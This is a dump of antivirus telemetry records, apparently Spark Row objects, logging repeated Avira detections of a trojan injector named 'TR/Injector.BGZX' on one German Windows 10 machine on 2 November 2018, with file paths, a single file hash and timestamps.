  Row(detection=Row(filename='avscan-20181102-053613-2e7a5536', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053613-2E7A5536', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055340-9e489f51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055340-9E489F51', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061827-14b84bf9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061827-14B84BF9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055328-97444782', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055328-97444782', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060825-ae1e3e3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060825-AE1E3E3F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054033-c94de888', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054033-C94DE888', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050524-e046f405', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050524-E046F405', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051640-7393791b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051640-7393791B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060815-a7f20b27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060815-A7F20B27', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061731-f3a89599', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061731-F3A89599', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060815-a80f2046', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060815-A80F2046', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051636-70acaf21', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051636-70ACAF21', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053614-2f294fb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053614-2F294FB9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051651-79e68378', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051651-79E68378', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055006-1edaeeff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055006-1EDAEEFF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062531-1152e2f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062531-1152E2F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061826-141fffa6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061826-141FFFA6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050525-e13053cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050525-E13053CD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061755-01eeb16a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061755-01EEB16A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062528-0fb22211', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062528-0FB22211', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055310-8ca06e96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055310-8CA06E96', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061723-ee8caf30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061723-EE8CAF30', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060812-a622a05f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060812-A622A05F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053622-33e0f4db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053622-33E0F4DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061809-09faae91', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061809-09FAAE91', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055335-9b58d9eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055335-9B58D9EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055045-3626756e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055045-3626756E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051651-7a217714', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051651-7A217714', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060811-a594ea68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060811-A594EA68', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062551-1d918849', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062551-1D918849', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055334-9b2381c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055334-9B2381C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061747-fcee5ce7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061747-FCEE5CE7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051654-7b85b18f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051654-7B85B18F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055045-3640b7b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055045-3640B7B1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060801-9fc6bc47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060801-9FC6BC47', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061615-c5e2613e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061615-C5E2613E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061757-02b37629', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061757-02B37629', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060838-b5836e95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060838-B5836E95', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060837-b559c9b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060837-B559C9B5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055045-36751f0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055045-36751F0C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060833-b27e2664', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060833-B27E2664', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061800-04d70e10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061800-04D70E10', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051623-68e4b905', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051623-68E4B905', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051637-719198c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051637-719198C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055023-294a2924', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055023-294A2924', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055023-28f8f629', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055023-28F8F629', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062536-1440c206', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062536-1440C206', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061710-e6dde5ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061710-E6DDE5EE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055026-2aec2fc2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055026-2AEC2FC2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061728-f1c74e31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061728-F1C74E31', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055333-9a790ba3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055333-9A790BA3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061648-d9c38778', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061648-D9C38778', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060845-b9d3e066', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060845-B9D3E066', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055343-a089a862', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055343-A089A862', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053652-45d90ffa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053652-45D90FFA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:51Z'), dt=datetime.date(2018, 11, 2)),
